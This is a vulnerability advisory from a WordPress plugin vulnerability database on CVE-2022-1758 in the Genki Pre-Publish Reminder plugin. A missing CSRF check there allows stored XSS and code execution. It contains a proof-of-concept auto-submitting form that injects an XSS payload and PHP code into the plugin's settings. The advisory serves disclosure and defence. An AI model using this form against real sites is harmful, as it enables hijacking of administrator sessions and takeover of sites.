WordPress Plugin Vulnerabilities

Genki Pre-Publish Reminder <= 1.4.1 - Stored XSS & RCE via CSRF

Description

The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack and lead to Stored XSS as well as RCE when custom code is added via the plugin settings.

Proof of Concept

<form id="test" action="https://example.com/wp-admin/options-general.php?page=genki-pre-publish-reminder/genki_pre_publish_reminder.php" method="POST">
    <input type="text" name="location" value="1">
    <input type="text" name="bordercolor" value="#e6db55">
    <input type="text" name="bgcolor" value="#ffffe0">
    <textarea name="list">
<img src=x onerror=alert(1)>
<?php echo "hacked"; ?>
</textarea>
    <input type="text" name="update_message" value="Save Changes">
</form>
<script>
    document.getElementById("test").submit();
</script>

Affects Plugins

Plugin icon
genki-pre-publish-reminder
No known fix

References

CVE
CVE-2022-1758

Classification

Type
CSRF
OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352
CVSS
8.8 (high)

Miscellaneous

Original Researcher
Daniel Ruf
Submitter
Daniel Ruf
Submitter website
https://daniel-ruf.de
Verified
Yes
WPVDB ID
211816ce-d2bc-469b-9a8e-e0c2a5c4461b

Timeline

Publicly Published
2022-05-23 (about 1 years ago)
Added
2022-05-23 (about 1 years ago)
Last Updated
2023-02-17 (about 1 years ago)

Other

Published
Title
Published
2023-11-21
Title
Ecwid Ecommerce Shopping Cart < 6.12.5 - Arbitrary Plugin Settings Change via CSRF
Published
2024-02-26
Title
Gestpay for WooCommerce < 20240307 - Cross-Site Request Forgery (CSRF) via ajax_set_default_card
Published
2023-04-19
Title
Gallery Metabox <= 1.5 - Gallery Removal via CSRF
Published
2023-01-19
Title
SRS Simple Hits Counter < 1.1.1 - Settings Update via CSRF
Published
2023-03-10
Title
Auto Prune Posts < 2.0.0 - Post Deletion Settings Update via CSRF